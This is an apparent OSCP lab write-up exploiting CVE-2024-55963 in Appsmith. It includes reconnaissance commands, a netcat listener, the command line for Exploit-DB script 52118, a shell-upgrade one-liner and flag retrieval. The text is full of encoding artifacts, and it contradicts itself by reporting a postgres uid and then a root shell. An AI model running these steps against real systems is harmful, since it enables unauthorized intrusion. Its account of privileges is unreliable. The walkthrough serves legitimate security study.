Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis

1. Reconnaissance

1.1 Nmap Scan

A full TCP port scan was performed with service/version detection and default scripts:

nmap -sC -sV -p- โ€” min-rate 1000 192.168.158.249

None

1.2 Key Findings

โ€ข Port 80 is running Appsmith โ€” a low-code internal application builder platform.

โ€ข Port 22 (SSH) is open โ€” useful for potential lateral movement or credential reuse.

โ€ข Port 443 (HTTPS) is closed, so all traffic is over plain HTTP.

โ€ข Appsmith is built on a Golang net/http server, fingerprinted via response headers.

1.3 Web Enumeration

Navigating to http://192.168.158.249 reveals a login page for Appsmith. Public user registration is enabled by default, which is a critical misconfiguration.

None

Version was confirmed via the API:

curl -s http://192.168.158.249/api/v1/product/version

2. Vulnerability Analysis

CVE-2024โ€“55963 โ€” Appsmith PostgreSQL Remote Code Execution

Appsmith ships with a bundled PostgreSQL instance. The pg_hba.conf file is misconfigured to allow any local OS user to connect as any PostgreSQL role without a password. An authenticated Appsmith user can create a datasource connection to this local PostgreSQL instance and execute arbitrary OS commands via the PostgreSQL COPY FROM PROGRAM directive.

CVE ID โ€” CVE-2024โ€“55963 โ€” CVSS Score โ€” 9.8 โ€” Critical

Exploit-DB: โ€” - 52118

Affected Versions- Appsmith < v1.52

Attack Type -Authenticated RCE via PostgreSQL COPY FROM PROGRAM

Attack Chain Overview

1. Register a new account on the Appsmith instance.

2. Create a new Workspace and Application.

3. Add a new datasource โ€” connect to the vulnerable local PostgreSQL server.

4. Create a query using COPY FROM PROGRAM to execute OS commands.

5. Retrieve command output from the database table.

6. Escalate to a reverse shell.

3. Exploitation

3.1 Setting Up the Listener

Before running the exploit, a Netcat listener was started to catch the incoming reverse shell:

nc -lvnp 1234

3.2 Exploit Script โ€” Exploit-DB 52118

The Python exploit script was downloaded from Exploit-DB. However, it contained a syntax error on line 333 โ€” a stray URL fragment was embedded in the code:

}/CVE-2024โ€“55963-Appsmith-RCE} โ† syntax error

The fix was straightforward โ€” the extra text was removed, leaving only the closing brace:

# Before (broken)

}/CVE-2024โ€“55963-Appsmith-RCE}

# After (fixed)

}

3.3 Running the Exploit

With the script fixed and the listener ready, the exploit was executed:

python3 52118.py -u http://192.168.158.249 "reverse_shell"

None

The exploit automatically performed the following steps:

โ€ข Registered a new user account on Appsmith.

โ€ข Logged in and created a new workspace and application.

โ€ข Discovered the vulnerable local PostgreSQL datasource.

โ€ข Connected to PostgreSQL and created a temporary table poc.

โ€ข Executed the reverse shell command via COPY FROM PROGRAM.

โ€ข Dropped the temporary table to clean up.

3.4 RCE Confirmed

Before obtaining the shell, the script confirmed remote code execution by running id:

None

Command output:

โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€” โ€”

uid=105(postgres) gid=105(postgres) groups=105(postgres),103(ssl-cert)

3.5 Reverse Shell Obtained

The Netcat listener received a connection from the target. A stable TTY was spawned using Python:

python3 -c 'import pty;pty.spawn("/bin/bash")'

# then: Ctrl+Z โ†’ stty raw -echo; fg โ†’ export TERM=xterm

4. Privilege Escalation

Upon obtaining the reverse shell, the current user context was checked immediately:

id

uid=0(root) gid=0(root) groups=0(root)

The shell was already running as root โ€” no privilege escalation steps were required. The Appsmith service itself appears to be running with root privileges, which directly resulted in a root shell upon exploitation.

4.1 Flag Retrieval

cat /root/root.txt

cat /home/*/user.txt

๐ŸŽฅ Full Practical Demonstration For a complete step-by-step video walkthrough, watch here: